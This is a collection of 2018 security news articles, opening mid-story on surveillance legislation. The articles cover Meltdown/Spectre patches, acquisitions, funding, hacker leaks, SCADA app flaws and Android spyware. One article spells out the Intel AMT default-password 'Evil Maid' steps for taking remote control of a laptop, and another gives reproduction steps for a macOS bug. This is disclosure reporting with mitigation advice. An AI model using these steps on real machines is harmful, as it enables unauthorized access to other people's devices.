But leaks and statements by officials have suggested that the amount of material collected is massive, and that the FBI routinely searches it for information on Americans.

Opponents had hoped the new bill would require agencies to obtain specific warrants to scan and make use of the communications of Americans scooped up in the process of spying on foreigners.

But a slight change that says the FBI needs a warrant to make use of the material in court does not hinder their ability to freely examine NSA files, critics said.

The bill "fails to meaningfully restrict the use of Section 702 to spy on Americans without a warrant," the American Civil Liberties Union said.

The bill could face stronger opposition in the Senate, where Senator Rand Paul has threatened a filibuster. But analysts expect that will only slow its eventual passage.


FireEye Acquires Big Data Firm X15 Software
17.1.2018 securityweek IT

Cyber threat protection firm FireEye said on Friday that it has acquired privately held big data platform provider X15 Software in a deal valued at roughly $20 million.

Under the terms of the acquisition, which closed on Jan. 11, FireEye agreed to pay approximately $15 million in equity and $5 million in cash to acquire Sunnyvale, Calif.-based X15.

FireEye says that X15’s technology will “add significant data management capabilities and provide customers with an open platform for integrating machine-generated data that can easily incorporate new security technologies and big data sources to adapt to the evolving threat environment.”

FireEye LogoShortly after acquiring security orchestration firm Invotas in February of 2016, FireEye made a push into orchestration and automation with the launch of its Security Orchestrator offering, designed to help eliminate repetitive manual processes, reduce process errors, and automate the correct response between different security controls. In late 2016, the company unveiled Helix, a platform designed to help customers efficiently integrate and automate security operations functions.

“Organizations today are overwhelmed by alerts, the number of tools required to manage their security operations, and the challenge of unifying access to the large volumes of data that matter,” John Laliberte, senior vice president of engineering at FireEye, said in a statement. “X15 Software technology will accelerate our strategy of delivering an innovative, next-gen security platform.”

FireEye claims that the integration of X15 Software’s technology will help FireEye’s security operations platform address the challenges of collecting, querying and analyzing large volumes of machine-generated data in real-time and manage security data from on-premise, hybrid and cloud environments.

X15 Software was founded in 2013 and currently employs approximately 20 employees.


Tool Detects Squatted Accounts on Social Networks, Code Repos
17.1.2018 securityweek
Social

Web security company High-Tech Bridge has improved its Trademark Monitoring Radar service with a feature designed to help organizations identify squatted or fraudulent accounts created on social networks and code repositories.

Trademark Monitoring Radar is a free service that hunts for malicious domain names. The service initially allowed organizations to detect potential cybersquatting and typosquatting of their domain or brand. A feature designed to detect phishing websites was later added.

The latest feature allows organizations to find typosquatting or cybersquatting attempts on social networks and code repositories. Users simply enter the name of their own domain and the service displays a list of potentially squatted accounts found on websites such as Facebook, Twitter, YouTube, Google Plus, GitHub and Bitbucket.

High-Tech Bridge told SecurityWeek that new social networks will be added in the upcoming period. The detection algorithms and the database storing information on malicious domains are continuously improved – the company says there is an improvement of roughly 10 percent every month. The results displayed for each tested domain are updated every 24 hours.

The Trademark Monitoring Radar service is fully automated, which can result in false positives. However, the security firm pointed out that it’s virtually impossible to automatically assess the impact of each account. On the other hand, each of the potential problematic accounts is displayed as a link, making it easier for users to manually verify them.

“We prefer to give more than less,” explained Ilia Kolochenko, CEO and founder of High-Tech Bridge. “For some companies, even the same user name can pose a potential problem. We saw when relatively innocent accounts were used in sophisticated credit card fraud.”

It can be useful for organizations to identify squatted or fraudulent accounts on social media websites as they can be abused by malicious hackers in combination with social engineering for spear phishing attacks. As for code repositories, fake accounts can be leveraged for delivering malware, Kolochenko said.

Once the fraudulent domains have been identified, the targeted organization can ask the service provider to take them down. While the process is often simple for major brands, it can be more difficult for smaller companies. “It can take longer or even require an intervention from a law firm,” Kolochenko explained.


Simple Attack Allows Full Remote Access to Most Corporate Laptops
17.1.2018 securityweek
Attack

Remote Attack Leverages Flaw in Intel AMT Technology

Attack is Simple to Exploit, Has Incredible Destructive Potential

Researchers have discovered a flaw in Intel's Advanced Management Technology (AMT) implementation that can be abused with less than a minute of physical access to the device.

An Evil Maid attack could ultimately give an adversary full remote access to a corporate network without having to write a single line of code.

The flaw was discovered by F-Secure senior security consultant Harry Sintonen, and disclosed today. It is unrelated to the "Apocalyptic AMT firmware vulnerability" disclosed in May 2017, or the current Meltdown and Spectre issues.

The new flaw is surprising in its simplicity. "It is almost deceptively simple to exploit, but it has incredible destructive potential," explains Sintonen. "In practice, it can give an attacker complete control over an individual's work laptop, despite even the most extensive security measures."

The problem is that setting a BIOS password (standard procedure) does not usually prevent access to the AMT BIOS extension -- the Intel Management Engine BIOS Extension (MEBx). Unless this separate password is changed, and usually it is not, the default 'admin' password will give the attacker access to AMT.

AMT is an out-of-band hardware-based remote management tool. It is chip-level and not dependent on software or an operating system. It requires only power and a connection. Its purpose is to give IT staff remote access to, and therefore control over, corporate devices; and is particularly useful for laptops used away from the office. It is found on computers with Intel vPro-enabled processors, and workstation platforms based on specific Intel Xeon processors -- in short, the vast majority of company endpoints.

If attackers have physical access to such a device, one need only boot up the device pressing CTRL-P during the process, and log in to MEBx with 'admin'. "By changing the default password, enabling remote access and setting AMT's user opt-in to "None", a quick-fingered cyber criminal has effectively compromised the machine," writes F-Secure.

The device itself might be considered secure, with a strong BIOS password, TPM Pin, BitLocker and login credentials -- but all of these can be bypassed remotely if the attackers are able to insert themselves onto the same network segment with the victim. "In certain cases," warns F-Secure, "the assailant can also program AMT to connect to their own server, which negates the necessity of being in the same network segment as the victim."

Once such an attack has succeeded, the target device is fully compromised and the attacker has remote ability to read and modify all data and applications available to the authorized user.

Although physical access is required for the attack, the speed with which it can be accomplished makes the Evil Maid attack (so-called because such attacks can be exploited in a hotel room if a device is left unattended for a brief period of time) a viable threat.

Sintonen describes a potential scenario. "Attackers have identified and located a target they wish to exploit. They approach the target in a public place -- an airport, a cafe or a hotel lobby -- and engage in an 'evil maid' scenario. Essentially, one attacker distracts the mark, while the other briefly gains access to his or her laptop. The attack doesn't require a lot of time -- the whole operation can take well under a minute to complete," Sintonen says.

Preventing such Evil Maid attacks is simple in principle, but complex in practice, requiring granular provisioning. AMT should be disabled for all devices that are unlikely to require it. Where it is required, each device needs to be provisioned with a strong password. This needs to be done for both new and currently deployed devices.

"It is recommended to query the amount of affected devices remotely, and narrow the list of assets needing attention down to a more manageable number. For computers connected to a Windows domain, provisioning can be done with Microsoft System Center Configuration Manager," suggests F-Secure. If any device is found to have an unknown password (in many cases this will be anything other than 'admin'), that device should be considered suspect and appropriate incident response procedures should be initiated.

Sintonen found the issue in July 2017. However, he also notes that Google's Parth Shukla mentioned it in an October 2017 presentation titled 'Intel AMT: Using & Abusing the Ghost in the Machine' delivered at Hack.lu 2017. Since awareness of the issue is already public knowledge, Sintonen recommends that organizations tackle the problem as soon as possible.


ICS Vendors Assessing Impact of Meltdown, Spectre Flaws
17.1.2018 securityweek
Vulnerebility

Organizations that provide solutions for critical infrastructure sectors, including medical device and industrial control systems (ICS) manufacturers, have started assessing the impact of the recently disclosed Meltdown and Spectre exploits on their products.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

While affected companies have been working on releasing both software and firmware mitigations, the changes made to a system can introduce significant performance penalties and in some cases users reported that the patches had broken their operating system and various applications.Spectre and Meltdown affect industrial control systems

Considering that in the case of industrial systems availability and integrity are of the utmost importance, vendors have warned customers that extensive testing should be conducted before any patches are applied in an effort to avoid disruptions.

Several vendors have published advisories to inform customers that they are assessing the impact of the Spectre and Meltdown exploits. The list includes Siemens, Schneider Electric, ABB, Rockwell Automation, and medical technology company Becton Dickinson (BD). ICS-CERT has also published an advisory directing users to the advisories of some vendors.

Siemens

In an advisory published on Thursday, Siemens told customers that it’s analyzing the impact of the vulnerabilities and available mitigations. Several of the company’s products may be affected as they are typically installed on systems powered by one of the affected processors.

“Updates for operating systems, processor firmware, and other systems can help to mitigate these vulnerabilities. Siemens is testing the compatibility of the patches released for supported operating systems for several products,” the company said.

“Siemens is aware that some updates can result in compatibility, performance or stability issues on certain products and operating systems. Operating system vendors, such as Microsoft, are still working to address these compatibility issues with their updates. Siemens will therefore continue to evaluate the applicability of those updates,” it added.

Until patches and workarounds can be safely applied, Siemens has advised organizations to ensure that untrusted code cannot be executed on systems running its products, which is a requirement for launching Meltdown and Spectre attacks.

Rockwell Automation

Spectre and Meltdown affect industrial control systems

Rockwell Automation has also confirmed that its customers’ environments are potentially impacted by the vulnerabilities.

The company is working with software and hardware partners on addressing the problem in its E1000, E2000 and E3000 Industrial Data Center (IDC) offerings. Its employees are also working on testing the updates made available by Microsoft.

Rockwell Automation has warned organizations that some of the updates released by Microsoft are known to cause anomalies in FactoryTalk-based products, including Studio 5000, FactoryTalk View SE, and RSLinx Classic. Rockwell has been working with Microsoft on resolving the anomalies.

Schneider Electric

Schneider Electric is also monitoring the situation. The company has informed customers that the list of impacted products includes StruxureWare Data Center Expert (DCE), StruxureWare Data Center Operation (DCO), NetBotz Appliances, APC Network Management Cards, PowerChute Network Shutdown, PowerChute Business Edition, PowerChute Personal Edition, and 1ph and 3ph UPS.

“Many of the initial mitigations proposed by hardware and operating system vendors indicate a high level of potential performance impact, Schneider Electric recommends caution if mitigations or patches are applied to critical and/or performance constrained systems,” Schneider Electric said. “If you elect to apply recommended patches or mitigations in advance of further guidance from Schneider Electric, we strongly recommend evaluating the impact of those measures on a Test & Development environment or an offline infrastructure.”

Schneider Electric’s Wonderware warned users that one of Microsoft’s updates causes Wonderware Historian to become unstable.

ABB

Swiss power and automation solutions provider ABB told customers that it has launched an investigation, but all products running on affected processors are potentially impacted.

“The vulnerabilities do not target any ABB products specifically, but potentially affect products that use affected processors in general,” ABB said in an advisory published last week.

Until the company assesses the impact of the attacks on each of its products, it has advised customers to ensure that industrial networks are protected against unauthorized access. Unlike other vendors, ABB has advised customers to install operating system updates without mentioning the potential risks associated with applying unstable patches.

BD

BD pointed out to customers that the vulnerabilities are not exclusive to its products or medical devices in general, and the company believes the risk of attacks is low. BD has provided a list of impacted products.

The company has advised users to apply patches from Microsoft and any firmware updates that may become available. However, the updates from Microsoft should only be applied after they have been tested and approved by BD.

Testing needed before applying patches

While not all ICS vendors mentioned it, any patches and mitigations for the Spectre and Meltdown vulnerabilities should be tested before being deployed to critical systems, particularly since some of them may cause devices to become unstable.

“The changes needed to fix Spectre and Meltdown vulnerabilities more thoroughly are so extensive that costly and extensive testing will be needed before the updates can safely be applied to reliability-critical control systems,” explained Andrew Ginter, VP of Industrial Security at Waterfall Security.

“In the very short term, what every control system owner and operator will be asking is ‘how long can we safely delay this very costly testing process?’ and ‘do I need to drop everything and start testing and applying these fixes yesterday?’,” Ginter added.


AMD Working on Microcode Updates to Mitigate Spectre Attack
12.1.2018 securityweek
Vulnerebility

AMD has informed customers that it will soon release processor microcode updates that should mitigate one of the recently disclosed Spectre vulnerabilities, and Microsoft has resumed delivering security updates to devices with AMD CPUs.

Shortly after researchers revealed the Spectre and Meltdown attack methods, which allow malicious actors to bypass memory isolation mechanisms and access sensitive data, AMD announced that the risk of attacks against its products was “near zero.”

The company has now provided additional information on the matter, but maintains that the risk of attacks is low.

According to AMD, its processors are not vulnerable to Meltdown attacks thanks to their architecture. They are, however, vulnerable to Spectre attacks.

Spectre attacks are made possible by two vulnerabilities: CVE-2017-5753 and CVE-2017-5715. The former does impact AMD processors, but the chipmaker is confident that operating system patches are sufficient to mitigate any potential attacks.

Microsoft announced a few days ago that it had suspended the delivery of security updates to devices with AMD processors due to some compatibility issues. AMD said the problem affected some older processors, including Opteron, Athlon and Turion families.

Microsoft said on Thursday that it had resumed the delivery of updates to a majority of AMD devices, expect for a “small subset” of older processors. AMD told customers it expects the issue to be corrected for the remaining processors by next week.

As for the second Spectre vulnerability, AMD believes it is difficult to exploit against its products. Nevertheless, the company has been working with operating system vendors to develop patches, and it has also promised to provide optional microcode updates.

The microcode updates should become available for Ryzen and EPYC processors in the next days, and for previous generation products sometime over the coming weeks. The updates will be available from system manufacturers and OS vendors.

AMD claims its GPUs are not impacted by the vulnerabilities. NVIDIA also says its GPUs are immune, but the company has still provided some display driver updates to help mitigate the CPU flaws.

Intel has already released patches, including processor microcode updates, for many of its processors. Linux users can install the microcode updates through the operating system’s built-in mechanism.

The fixes for the Spectre and Meltdown vulnerabilities appear to cause problems on some systems. Ubuntu users complained that their devices failed to boot after installing updates, forcing Canonical to release a new kernel update to address the issue.

Intel has also become aware of reports that systems with Broadwell and Haswell CPUs reboot more often as a result of the patches.

“We are working quickly with these customers to understand, diagnose and address this reboot issue. If this requires a revised firmware update from Intel, we will distribute that update through the normal channels. We are also working directly with data center customers to discuss the issue,” the company stated.


Proposed Legislation Would Create Office of Cybersecurity at FTC
12.1.2018 securityweek Cyber

Two Democratic senators, Elizabeth Warren, D-Mass., and Mark Warner, D-Va, introduced a bill Wednesday that would provide the Federal Trade Commission (FTC) with punitive powers over the credit reporting industry -- primarily Equifax, Credit Union and Experian -- for poor cybersecurity practices.

The bill is in response to the huge Equifax breach disclosed in September, 2017. "Equifax allowed personal data on more than half the adults in the country to get stolen, and its legal liability is so limited that it may end up making money off the breach," said Senator Warren in a Wednesday statement.

If the bill succeeds, it will become the Data Breach Prevention and Compensation Act of 2018. It will create an Office of Cybersecurity at the FTC, "headed", says the bill (PDF), "by a Director, who shall be a career appointee." This Office would be responsible for ensuring that the CRAs conform to the requirements of the legislation, and would have the power to establish new security standards going forwards.

The punitive power of the Act comes in the level of the potential fines, beginning with a base penalty of $100 for each consumer who had one piece of personal identifying information (PII) compromised and another $50 for each additional PII compromised per consumer. On this basis, were the Act already in force, Equifax would be facing a fine of at least $1.5 billion.

Under current law, say the lawmakers, it is difficult for consumers to get compensation when their personal data is stolen. Typical awards range from $1 to $2 per consumer. This bill requires the FTC to use 50% of its penalty to compensate consumers.

The maximum penalty is capped at 50% of the credit agencies' gross revenue from the previous year. This dwarf's even the EU's General Data Protection Regulation (GDPR) maximum fine set at 4% of global revenue -- but it gets worse: it could increase to 75% of gross revenue where the offending CRA fails to comply with the FTC's data security standards or fails to timely notify the agency of a breach.

The bill requires CRAs to notify the FTC of a breach within 10 days of the breach -- it doesn't at this stage specify whether that is 10 days from the breach occurring, or 10 days from discovery of the breach. Within 30 days of being so notified, the FTC is then required to "commence a civil action to recover a civil penalty in a district court of the United States against the covered consumer reporting agency that was subject to the covered breach."

While 50% of any recovered money is to compensate the victims of the breach, the remaining 50% is to be used for cybersecurity research and inspections by the FTC's new Office of Cybersecurity.

"In today's information economy, data is an enormous asset. But if companies like Equifax can't properly safeguard the enormous amounts of highly sensitive data they are collecting and centralizing, then they shouldn't be collecting it in the first place," said Sen. Warner. "This bill will ensure that companies like Equifax -- which gather vast amounts of information on American consumers, often without their knowledge -- are taking appropriate steps to secure data that's central to Americans' identity management and access to credit."

How much traction this bill will receive in the Senate remains to be seen, but it reflects the general dismay felt by the size of the Equifax breach -- which could have been prevented if patches had been applied. It is not the first Equifax-related legislative proposal, but it is by far the most punitive. In November 2017, New York State Attorney General Eric T. Schneiderman introduced the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to improve security specifically within New York State.

SHIELD fines are capped at $250,000, and the disclosure requirement is vague: "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..." Put very simply, both proposals are designed to improve the security of their respective 'covered entities' (CRAs are covered in both bills), but SHIELD seeks to do so in a 'business friendly' manner, while the Data Breach Prevention and Compensation Act of 2018 seeks to do so in a 'consumer friendly' manner.


Bogus Passwords Can Unlock AppStore Preferences in macOS
12.1.2018 securityweek Apple

A security vulnerability impacting macOS High Sierra allows admins to unlock the AppStore Preferences in System Preferences by providing any password.

The issue was found to affect macOS 10.13.2, the latest iteration of the platform, and can be reproduced only if the user is logged in as administrator. For non-admin accounts, the correct credentials are necessary to unlock the preferences pane.

macOS High Sierra 10.13.2 users interested in reproducing the bug should log into their machines as administrators, then navigate to the App Store preferences in System Preferences.

Next, users should click on the padlock icon to lock it if necessary, then click it again. When prompted to enter the login credentials, they can use any password and still unlock the Prefpane.

One thing that should be noted is that the App Store setting is opened up unlocked by default when the user is logged as admin and that no sensitive user information can be accessed by triggering the bug.

Eric Holtam notes the security oversight only impacts the App Store preferences and no other system preferences menu can be unlocked in a similar manner. The admin password is still required when attempting to change user and other system preferences.

The issue, however, is not as dangerous as it might look. For starters, the bug can only be triggered if the user is logged in as admin, which clearly minimizes the vulnerability’s impact, given that the admin can unlock the specific settings.

Users affected by the flaw would be those who, although logged as admins, would still keep the App Store preferences locked. In such cases, if the machine was left unattended, anyone with physical access to it could change the respective settings.

Apple, however, is already working on addressing the issue. A patch has been included in the latest beta seed of macOS High Sierra (10.13.3) and will be released to all Mac users in a future software update.

In late November, the tech giant patched a critical authentication bypass vulnerability in macOS High Sierra 10.13.1, where anyone could login as root by providing any password. The attack however, was possible only if the root account hadn’t been enabled or a password hadn’t been set for it. However, experts revealed that remote attacks were also possible.


Never too late, Skype supports end-to-end encryption for new Private Conversations feature
12.1.2018 securityaffairs
Social

It’s official, Microsoft’s Skype is rolling out a new feature called Private Conversations, which uses end-to-end encryption.
The latest version of Skype implements end-to-end encryption and introduces the support for the Signal protocol. which is the protocol used by WhatsApp, Facebook Messenger, Google Allo, and Signal.

Attackers will not able to snoop on Skype Private Conversations will support text, audio calls, and file transfers, thanks to the introduction of the end-to-end encryption.

“We know extra protection is important as you share sensitive information over Skype so we’re excited to announce the preview of end-to-end encrypted Private Conversations, available now for Skype Insiders.” states the announcement published by Microsoft.

“With Private Conversations, you can have end-to-end encrypted Skype audio calls and send text messages or files like images, audio, or videos, using the industry standard Signal Protocol by Open Whisper Systems. The content of these conversations will be hidden in the chat list as well as in notifications to keep the information you share private.”

Currently, Presently, Private Conversations are only available in the Insider builds of Skype that is already included in the desktop version of the app, along with the iOS, Android, Linux, and macOS clients.

Unfortunately, Private Conversations still don’t support video calling, and this is a very big limitation.

Experts criticized Skype in the past because it always failed in implementing end-to-end encryption, this limitation advantaged many other instant messaging services like WhatsApp and Facebook Messenger.

The adoption of the Signal protocol is very important, this is the first time Microsoft doesn’t use a proprietary encryption Skype protocol.

If you want to test the new feature, select “New Private Conversation” from the compose menu or from the recipient’s profile.

“After the recipient accepts your invite, all calls and messages in that conversation will be encrypted end-to-end until you choose to end it.” continues Microsoft. “You can only participate in a private conversation from a single device at a time. You can switch the conversation to any of your devices, but the messages you send and receive will be tied to the device you’re using at the time.”

skype%20end-to-end-encryption%20private-


Security Operations Firm Arctic Wolf Raises $16 Million
11.1.2018 securityweek IT
Arctic Wolf Networks, a Sunnyvale, Calif.-based company that offers outsourced security operations center (SOC) services, announced on Wednesday that it has raised $16 million in new funding.

According to the company, the new injection of cash will help support overall business growth, and fuel sales and marketing, product development and strategic alliance initatives.

With security operations teams overwhelmed by the sheer volume of vulnerabilities across the enterprise, they are falling behind in efforts to remediate them. According to a mid 2017 report published by EMA, seventy-four per cent of security teams admit they are overwhelmed by the volume of maintenance work required.

This is a problem that Artic Wolf aims to help with. The company offers a turnkey “SOC-as-a-Service” that includes what the company calls a “Concierge Security Engineer” (CSE) that is a single point of contact for a customer and an extension of a customer’s internal security team.

“Security operations centers are an essential element of modern cybersecurity, and every company needs one,” said Brian NeSmith, CEO and co-founder of Arctic Wolf. “We are transforming how companies look at cybersecurity from a product-centric view to one focused on proactive detection and response. The new funding allows us to invest in key areas of the business and maintain our extraordinary growth trajectory.”

The funding round was led by Sonae Investment Management with participation from Lightspeed Venture Partners, Redpoint Ventures and Knollwood Investment Advisory.


Hackers Leak Olympic Committee Emails in Response to Russia Ban
11.1.2018 securityweek Hacking
A group of hackers linked to Russia has leaked several emails apparently exchanged between officials of the International Olympic Committee (IOC) and other individuals involved with the Olympics. The leak comes in response to Russia being banned from the upcoming Pyeongchang 2018 Winter Games in South Korea.

The group, calling itself Fancy Bears and claiming to be a team of hacktivists that “stand for fair play and clean sport,” previously released confidential athlete medical records stolen from the systems of the World Anti-Doping Agency (WADA), and also targeted the International Association of Athletics Federations (IAAF). One of their most recent leaks included emails and medical records related to football (soccer) players who used illegal substances.

The first leaks from Fancy Bears came shortly after Russian athletes were banned from the 2016 Rio Olympics following reports that Russia had been operating a state-sponsored doping program.

While Fancy Bears claim to be hacktivists, researchers have found ties between the group and Fancy Bear, a sophisticated Russian cyber espionage team also known as APT28, Pawn Storm, Sednit, Sofacy, Tsar Team and Strontium.

The latest leak includes emails apparently exchanged between IOC officials and other individuals involved with the Olympics. Some of the messages discuss the recent decision to ban Russia from the upcoming Winter Games based on the findings of the IOC Disciplinary Commission.

“These emails and documents point to the fact that the Europeans and the Anglo-Saxons are fighting for power and cash in the sports world. WADA headquartered in Montreal, Canada supported by the United States Olympic Committee declared the crusade against the IOC on the pretext of defending clean sport,” the hackers said. “However, the genuine intentions of the coalition headed by the Anglo-Saxons are much less noble than a war against doping. It is apparent that the Americans and the Canadians are eager to remove the Europeans from the leadership in the Olympic movement and to achieve political dominance of the English-speaking nations.”

While the hackers claim the emails they leaked prove the accusations, a majority of the messages don’t appear to contain anything critical. Furthermore, Olympics-related organizations whose systems were previously breached by the hackers claimed at the time that some of the leaked files had been doctored.

WADA representatives told Wired that Fancy Bears are looking to “undermine the work of WADA and others,” and claimed that everything they leaked this week is “dated.” WADA officially accused Russia of being behind previous attacks.

It’s unclear how the emails have been obtained by the hackers, but the group has been known to launch phishing attacks involving fake WADA domains. It’s possible that they tricked some of the individuals whose emails have been compromised into handing over their credentials on a phishing site.

Russia has been accused by several experts of disguising some of its cyber campaigns as hacktivism. For instance, a hacker using the moniker Guccifer 2.0 has taken credit for an attack on the U.S. Democratic Party, which may have influenced last year’s presidential election.

Many believe the Fancy Bears attacks are Russia’s response to its athletes being banned. Perhaps unsurprisingly, articles from two major pro-Russia English-language news organizations suggest that the latest leak from Fancy Bears shows that Russia’s exclusion from the Olympics was politically motivated.

Security firm McAfee reported last week that several organizations associated with the Olympics had received emails set up to deliver information-stealing malware, but it’s unclear who is behind the attacks.


Endgame Lands $1 Million Contract From U.S. Navy
11.1.2018 securityweek IT
Endgame, an Arlington, VA-based supplier of advanced endpoint protection software, has been awarded a $1 million contract by the U.S. Fleet Cyber Command/U.S. Tenth Fleet. The purpose of the contract is to protect more than 500,000 computers and ships' hull, mechanical and electrical systems, weapons and navigation systems, aviation systems, and the technology controlling physical devices on bases and facilities.

"Endgame is honored to enter this partnership with the U.S. Navy," said Nate Fick, Endgame CEO and U.S. military combat veteran. "The Navy is widely known as being on the cutting-edge of cybersecurity defenses, and we were happy to exceed their protection requirements during this competitive process. Safeguarding the most targeted organizations across the Department of Defense is an important part of our mission, and we look forward to continuing it with the Navy."

Endgame LogoFleet Cyber Command is the central cyber authority for the entire U.S. Navy, serving (in its own words), "to direct Navy cyberspace operations globally to deter and defeat aggression and to ensure freedom of action to achieve military objectives in and through cyberspace."

Specifically, the contract is for the acquisition of the Endgame Hunt Team Platform with 10,000 sensors, plus maintenance and support.

Endgame credits the contract to its existing history in protecting both federal government and the U.S. military, and its ability to protect against targeted attack techniques and technologies outlined in the MITRE ATT&CK Matrix. In 2016 it was awarded an $18.8 million contract by the U.S. Air Force.

The Navy's contract justification and approval document is more specific: "Delivered as a single agent, replacing the functions of AV, NGAV, IR, EDR, and exploit prevention agents, Endgame stops all targeted attacks and their components." It scans for vulnerabilities, compares against current STIG checklists, and conducts "if-then scenarios with secondary and tertiary effects (also known as a blast radius)..."

The STIG checklist is a NIST Windows 10 Security Technical Implementation Guide designed to improve the security of Department of Defense information systems. Endgame automatically maps the network against the STIG checklist to evaluate the network's security posture.

While stressing that FLTCYBER will continue to monitor the evolution of EDR, EPP and Next Gen AV technologies that could compete with Endgame in the future, it found that no other single technology currently provides all of its requirements. While combinations of other products could provide much of its required functionality, some requirements could still only be found in Endgame.

Of particular note is Endgame's ability to calculate the "blast radius" on a compromised box. Applied to cybersecurity, the blast radius is the potential effect on the overall network from a compromise. Network segmentation can, for example, limit the blast radius. Endgame's ability to apply 'what-if' scenarios can help security teams determine whether their network configuration is able to contain a potential compromise.

"No other product has been found by the FLTCYBER team at this time that can perform the blast radius function of Endgame," the Navy explained. "This has been identified as a key requirement by FLTCYBER."

Endgame was founded in 2008 by Chris Rouland and other executives who previously worked with the CIA and Internet Security Systems. It originally discovered and sold 0-day vulnerabilities, but shifted away from this around 2014. Under Fick's leadership it has grown its commercial offering using a $23 million Series B funding round in March 2013 followed by a $30 million Series C round in November 2014.


Security Flaws Found in Majority of SCADA Mobile Apps
11.1.2018 securityweek Mobil
Researchers from IOActive and Embedi have conducted an analysis of SCADA mobile applications from 34 vendors and found vulnerabilities in a vast majority of them, including flaws that can be exploited to influence industrial processes.

Two years ago, researchers Alexander Bolshev and Ivan Yushkevich analyzed 20 mobile apps designed to work with industrial control systems (ICS) software and hardware. At the time, they had found roughly 50 security issues – at least one in each application.

Bolshev, who now works for IOActive, and Yushkevich, currently an employee of Embedi, have once again decided to analyze mobile applications used for supervisory control and data acquisition (SCADA) systems in an effort to determine how the landscape has evolved now that the Industrial Internet of Things (IIoT) has become more prevalent.

This time, the experts randomly selected SCADA applications offered on the Google Play Store by 34 vendors – in most cases different than the ones tested back in 2015. The analysis focused on the client apps and backend systems, and it targeted both local and remote applications.

Local applications are typically installed on the tablets used by engineers and they connect directly to industrial devices via Bluetooth, Wi-Fi or a serial connection. Since these programs can be used to control devices such as PLCs, RTUs and industrial gateways, they are typically only used within the plant perimeter, which is considered safe. Remote applications, on the other hand, allow engineers to connect to ICS via the Internet and private cell networks. While in most cases they are only designed for monitoring processes, some of them do allow users to control processes.

Bolshev and Yushkevich set out to find vulnerabilities described in the 2016 OWASP Mobile Top 10 list. These flaws can allow attackers with local or remote access to a device – and ones in a man-in-the-middle (MitM) position – to directly or indirectly influence an industrial process, or trick an operator into performing a harmful action.

Apps from both independent developers and major vendors were tested, which led to the discovery of 147 vulnerabilities in clients and their backend systems.

SCADA%20mobile%20app%20vulnerabilities

Researchers found that all but two of the applications failed to implement protections against code tampering. The two apps that had such a mechanism only implemented a basic root detection feature. It is easier for malicious hackers to exploit vulnerabilities on rooted Android devices and some malware families are designed to root smartphones and tablets.

More than half of the tested applications also lacked secure authorization mechanisms – only 20 percent of the local apps implemented an authorization system correctly. The most common problems are the lack of password protection and the presence of a “remember password” feature, which defeats the purpose of setting password protection.

The experts also found that more than half of the apps lacked code obfuscation and other mechanisms designed to prevent reverse engineering. Allowing attackers to reverse engineer an application makes it easier for them to find and exploit vulnerabilities.

Nearly half of the tested apps also failed to store data securely. Data is often stored on the SD card or on a virtual partition, and it’s not protected with access control lists (ACLs) or other permission mechanisms.

Unsurprisingly, more than one-third of the analyzed applications failed to secure communications, including via poor handshakes, incorrect SSL versions, and cleartext data transmission. Researchers noted that their tests did not cover applications using Modbus and other ICS protocols, which are insecure by design.

As for backend issues, researchers discovered various types of vulnerabilities, including SQL injection, memory corruption, DoS, and information leakage flaws.

Back in 2015, Bolshev and Yushkevich predicted that the problems they had found would disappear in the future as a result of the rapidly developing nature of mobile software and the growth of IoT. However, their predictions have not proved to be correct, with the latest tests showing that more than 20 percent of the discovered issues allow malicious actors to misinform operators and influence industrial processes.


Highly Targeted Attacks Hit North Korean Defectors
11.1.2018 securityweek BigBrothers
A recent set of attacks aimed at North Korean defectors and journalists were associated with a highly targeted campaign conducted by an actor that does not appear to be related to any known cybercrime groups, McAfee says.

The attacks used a range of vectors to infect victims with malware, including email, the KakaoTalk chat application (which is popular in South Korea), and social network services such as Facebook. Some of the attacks also employed Google-shortened URLs to spread malware.

McAfee’s research into the incident revealed the use of two versions of the dropper malware, namely applications called “Pray for North Korea” and “BloodAssistant.” Most of the clicks leading to infection originated from South Korea in both cases, McAfee's security researchers discovered.

The most frequently observed browser and operating system combination for the clicks was Chrome and Windows, with Android coming in second, McAfee notes in a technical report. Furthermore, the investigation revealed that Facebook was used in 12% of infections to send a malicious link to the targets.

The Trojan used in this campaign, which McAfee detects as Android/HiddenApp.BP, is dropped onto the victim’s device via malicious APK files. Although various malicious apps are used for malware delivery, the dropper mechanism is identical, the researchers say.

The dropper first checks whether the device hasn’t been already infected, then tricks the victim into enabling accessibility permissions. The application then displays an overlay to hide the fact that it turns on required settings and downloads and installs the Trojan. The overlay is removed once the installation has been completed.

The Trojan uses cloud services such as Dropox and Yandex as the command and control (C&C) server. Once installed, it uploads device information to the cloud, then downloads a file containing commands and other data to control the infected device. Malicious behavior such as saving SMS messages and contact information is implemented in a separate DEX file.

Variants of the malicious APKs were found on Google Drive, some using different cloud services as C&Cs, while others also dropping a separate call-recording application.

The researchers discovered that the initial malicious APKs were uploaded to Google Drive from a single account, which was also associated with a social network account. The same account is believed to have been used to send shortened URLs to victims.

The group behind the account appears to know the South Korean culture well, yet the account also revealed the use of the North Korean word for “blood type,” instead of the South Korean word. A North Korean IP address was also found in test log files on some Android devices connected to accounts used to spread the malware.

The researchers also discovered a deleted folder named Sun Team, supposedly revealing the name of the actor behind the campaign, which has been supposedly active since 2016.

“This malware campaign is highly targeted, using social network services and KakaoTalk to directly approach targets and implant spyware. We cannot confirm who is behind this campaign, and the possible actor Sun Team is not related to any previously known cybercrime groups. The actors are familiar with South Korea and appear to want to spy on North Korean defectors, and on groups and individuals who help defectors,” McAfee concludes.


Meltdown Patch Broke Some Ubuntu Systems
11.1.2018 securityweek
Vulnerebility
Canonical was forced to release a second round of Ubuntu updates that address the recently disclosed CPU vulnerabilities after some users complained that their systems no longer booted after installing the initial patches.

On January 9, Canonical released Ubuntu updates designed to mitigate Spectre and Meltdown, two recently disclosed attack methods that work against processors from Intel, AMD, ARM, Qualcomm and IBM. The Linux kernel updates mitigate the vulnerabilities that allow the Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715) attacks.

Shortly after the kernel was updated to version 4.4.0-108, some Ubuntu users started complaining that their systems had failed to boot. Restoring the system to an earlier version apparently resolved the problem.

The updates released by Microsoft in response to the CPU flaws also caused problems, but only for users with some older AMD processors. The company has decided to no longer deliver the updates to AMD devices until compatibility issues are resolved. In the case of Ubuntu, however, the update has affected users with Intel processors.

